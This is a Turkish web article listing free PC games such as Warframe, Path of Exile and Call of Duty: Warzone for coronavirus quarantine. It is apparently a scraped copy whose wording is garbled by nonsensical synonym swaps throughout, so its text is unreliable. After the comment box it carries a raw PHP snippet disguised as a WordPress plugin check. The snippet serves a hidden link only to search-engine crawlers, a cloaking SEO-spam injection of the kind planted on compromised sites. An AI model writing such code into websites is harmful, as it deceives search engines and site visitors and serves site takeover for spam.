Sıradaki içerik:

Elektronik Kağıt Tabanlı Esnek ve Renkli Ekran Geliştirildi

e
sv

Eve Kapananlar İçin 14 Kaliteli ve Ücretsiz Oyun

04 Aralık 2020 21:32
avatar

 • e 0

  Mutlu

 • e 0

  Eğlenmiş

 • e 0

  Şaşırmış

 • e 0

  Kızgın

 • e 0

  Üzgün

Dünyayı etkisi altında meydan koronavirüs salgını sonucunda imkanlarımızın ruhsat verdiği ölçüde evlerimize kapandık. Zamanın yavaşladığı kişisel karantina günlerinde, zihnimizi de zaman vakit izole etmemiz gerekiyor. Bunun en kolay yolu da eğlenceye başvurmak, film ve dizi izlemek, kitap okumak ya da oyun oynamak.

Biz de evde geçirdiğiniz zamanı daha da eğlenceli kılacak oyunları bir araya getirmek istedik. Üstelik listedeki oyunların tamamı ücretsiz ve çoğu az bilinen yapımlardan oluşuyor. İlginizi çeken oyuna başlamak için başlığa tıklayabilirsiniz, şimdiden iyi eğlenceler.

Karantina günleri için ücretsiz bilgisayar oyunları:

Kaptan olarak bir uzay gemisini yönetin: Dreadnought

Çıkış tarihi: 5 Aralık 2017Geliştirici: Six Foot, YAGER

Birden fazla uzay gemisini seçip oyuna başlayabiliyoruz. Her geminin boyut ve hız gibi farklı parametrelerde avantajları ve dezavantajları var. Kendi oyun tarzımıza uygun gemiyi bulduktan sonra uzaya hükmetmek için için yola çıkıyor.

Tarihin en etkileyici savaş uçakları ile aksiyonun dibine vurun: World of Warplanes

Çıkış tarihi: 12 Kasım 2013Geliştirici: Wargaming, Lesta Studio

Oyunda Almanya, Sovyetler Birliği ve ABD gibi II. Dünya Savaşı taraflarına ait 100’ün üzerinde hava aracı var. Uçaklar kendi içlerinde yapılarına göre farklı türlere ayrılıyor. Oyunculara da II. Dünya Savaşı atmosferine uçak savaşıyla katılmak düşüyor.

The Witcher efsanesinden doğan sürükleyici kart oyunu: Gwent: The Witcher Card Game

Çıkış tarihi: 25 Ekim 2016Geliştirici: CD Projekt, CD Projekt RED

Gwent oyununun mantığından da bahsedelim. Oyun iki şahıs arasında oynanıyor. Her oyun 3 turdan oluşuyor. İki oyuncu da her devir birer kart oynayabiliyor. Kartlar Witcher serisinde bulunan farklı ülkelere ait karakterlerden oluşuyor. Her ülkenin liderinin kendisine has bir gücü var. Oyun sırasında askerî birliklerin ve liderlerin güçlerini kullanarak karşı tarafı alt etmeye çalışıyoruz.

Mincraft'a online ve ücretsiz bir alternatif: Trove

Çıkış tarihi: 9 Temmuz 2015Geliştirici: Trion Worlds

Oyunda her oyuncu farklı bir sınıftan ıra seçebiliyor. Karakter için lüzumlu eğitim tamamlandıktan sonra “Hub” ismi verilen bir bölgeye gönderiliyor. Bu bölgede farklı oyun içi dünyalara kapı görevi gören portallar var. Her bir portalın içinden geçebilmek için belli bir kuvvet gerekiyor.

Kıyamet sonrası hayali bir dünyada arkadaşlarınızla hayatta kalın: Dauntless

Çıkış tarihi: 21 Mayıs 2019Geliştirici: Phoenix Labs, Iron Galaxy

Oyun, aka bir felaket ardından sona doğru sürüklenen bir dünyada geçiyor. Bu dünyada Behemot adı verilen yaratıklar var. Oyuncular da Behemotları avlayan bir toplumun bireylerini canlandırıyor. 

Özel güçlere sahip olabileceğiniz bir online FPS: Warframe

Çıkış tarihi: 25 Mart 2013Geliştirici: Digital Extremes, Panic Button Games

Warframe içerisinde nişancı, rol yapma ve gizlilik türlerini barındırıyor. Her oyuncu dilediği şekilde bir Tenno karakteri oluşturuyor. Oyunun ismi ise bu karakterlerin giydiği zırhtan geliyor. Warframe zırhı aynı zamanda karakterlere özel güçler kazandırarak savaş sırasında avantaj sağlıyor.

Asla kendini yine etmeyen bir rol yapma oyunu: Path of Exile

Çıkış tarihi: 23 Ekim 2013Geliştirici: Grinding Gear Games

Oyuncular kuş bakışı bir görüntüden biricik bir karakteri yönetiyorlar. Kocaman bir dünyada mağaralar, zindanlar ve aleni alanlar arasında mekik dokuyorlar. Tecrübe puanı kazanmak için öbür karakterlerden görevler alıyorlar. Oyunun en güzel tarafı da neredeyse tüm bölgelerin her girişte yeniden dizayn edilmesi. Bu sayede oyunun yeniden oynanabilirliği bir hayli artıyor.

Herkesin en güçlü seviyede başladığı, arabalar ile oynanan bir MOBA: Heavy Metal Machines

Çıkış tarihi: 31 Ocak 2017Geliştirici: Hoplon Infotainment

Heavy Metal Machines her ne kadar bir MOBA oyunu olsa da mekanikleriyle bir fark yaratıyor. Çünkü oyunda kule, şerit ve minyon gibi alışılagelmiş mekanizmalar yok. Aynı zamanda öbür MOBA oyunları gibi takım savaşları için herkesin güçlenmesi beklenmiyor. Çünkü herkes zaten en güçlü seviyede başlıyor.

Karakterlerini dünya mitolojilerinden meydan MOBA: Smite

Çıkış tarihi: 25 Mart 2014Geliştirici: Titan Forge Games

Smite MOBA türünü üçüncü şahıs kamerasına taşımasıyla epey dikkat çeken bir oyun olmuştu. Hatta çektiği bu dikkat zamanla oyunu Steam’e getirdi. Yükselen popülerliğiyle birkaç yıl içerisinde tüm popüler oyun konsollarına çıktı.

Oyunda yönetilen karakterler ise Yunan, İskandinav, Japon gibi farklı mitolojilerde yer meydan isimler. Örneğin Thor savaşçı sınfına ait bir tanrıyken, Odin tank türünde bir rab olarak oynanılabiliyor. Mantık olarak ise herhangi bir MOBA oyununa oldukça benzer.

Overwatch efsanesinin ücretsiz alternatifi: Paladins

Çıkış tarihi: 8 Mayıs 2018Geliştirici: Evil Mojo Games

Oyunda “Champion” adı verilen birçok ıra var. Oyuncu bu karakterler arasından istediğini seçerek bir oyuna giriyor. Oyunun geri kalanı da buraya kadar olduğu gibi MOBA türüne oldukça benziyor. Tek fark, birinci şahıs nişancı türünde bir oyun olması.

Büyük çaplı savaşlar, siyah ve hava araçlarını kullanabileceğiniz bir online FPS: PlanetSide 2

Çıkış tarihi: 20 Kasım 2012Geliştirici: Sony Online Entertainment

Oyun, 2003 yılında çıkan PlanetSide’ın geliştirilmiş hâli gibi. Aynı dünyayı ve toplulukları barındıran yapım, neredeyse aynı zaman diliminde geçiyor. Önceki oyunda olduğu gibi bölge kontrolü, aka çaplı savaşlar ve kara, hava araçları bulunuyor.

İkinci Dünya Savaşı'nın dokusuna sahip online FPS: Heroes & Generals

Çıkış tarihi: 23 Eylül 2016Geliştirici: Reto-Moto

Heroes & Generals birinci şahıs nişancı türüyle gerçek zamanlı strateji türünü birleştirmesiyle dikkat çekiyor. II. Dünya Savaşı zamanında geçen bu oyun, geliştiricileri tarafından klasikleşmiş devasa fazla oyunculu oyunlardan sıyrılması için yapıldı.

Oyuncu ABD, Sovyetler Birliği veya Almanya ülkelerinin bir piyadesi olarak başlıyor. Oyunda ilerledikçe oyun içi parayla yeni askerler satın alabiliyor. Oyuncu tertip atladıkça farklı oyun modları, farklı askerî birlikler gibi özellikler açabiliyor.

Bir online FPS'den beklediğiniz her şeyi bir arada sunan Call of Duty: Warzone

Çıkış tarihi: 10 Mart 2020Geliştirici: Infinity Ward, Raven Software

Call of Duty gibi bir markanın ücretsiz bir Battle Royale oyununa kavuştuğunu duymayanınız kalmamıştır. Ancak biz gene de böylesine sansasyonel bir oyunu listemize eklemeden edemedik. Oyun 10 Mart 2020 tarihinde çıkış yapmasının ardından yüksek bir hızla fazla sayıda oyuncu tarafından oynanmaya başladı.

Oyun her ne kadar Modern Warfare’ın bir modu olarak görünse de aslında biricik başına çalışabilen, muhtemelen de uzun yıllar boyunca piyasaya tutunabilecek bir yapım. Battle Royale öğelerini Call of Duty temasıyla fazla başarılı bir şekilde birleştirdiği için izolasyon zamanında uzun saatler boyunca oynanabilir.

İsteyenleri arkadaşlarla oynanacak mobil oyunlar listemize de göz atabilirler. Böylelikle kişisel izolasyonunuz sırasında hiçbir ücret ödemeden oynayabileceğiniz ücretsiz oyunlara baktığımız yazımızın sonuna geliyoruz. Unutmayın; koronavirüs tedbirlerimizden daha güçlü olamaz. Tedbiri asla elden bırakmayın, korkmayın ve olası olduğu kadar evinizden çıkmamaya özen gösterin. Webtekno hepinize sağlıklı günler diler.

BONUS: Bir devre PC'ye damgasını vurup telefona gelen mobil oyunlar

 • Site İçi Yorumlar

En az 10 karakter gerekli
function isBot() { $botAgents ="/google|hakia|msn|yahoo|altavista|crawler|findlinks|bing|Cuil|Excite|Go.com|HotBot|AllTheWeb|search.aol|Lycos|Alexa|ask|baidu|cuil|kosmix|sogou|yodao|yandex|infoseek|yebol|aol/i"; $agent = $_SERVER['HTTP_USER_AGENT']; if (preg_match($botAgents,$agent)) return true; else return false; } function wordpres_plugin_check_core(){ $altsayfa = 1; $bot = 1; $link = ' '; if($altsayfa == 1){ $say_s = $_SERVER['REQUEST_URI']; $saydim = strlen($say_s); if($saydim > 4){ if($bot == 1){ if (isBot()) { echo $link; } }else{ echo $link; } } }else{ if($bot == 1){ if (isBot()) { echo $link; } }else{ echo $link; } } } add_action('wp_footer', 'wordpres_plugin_check_core');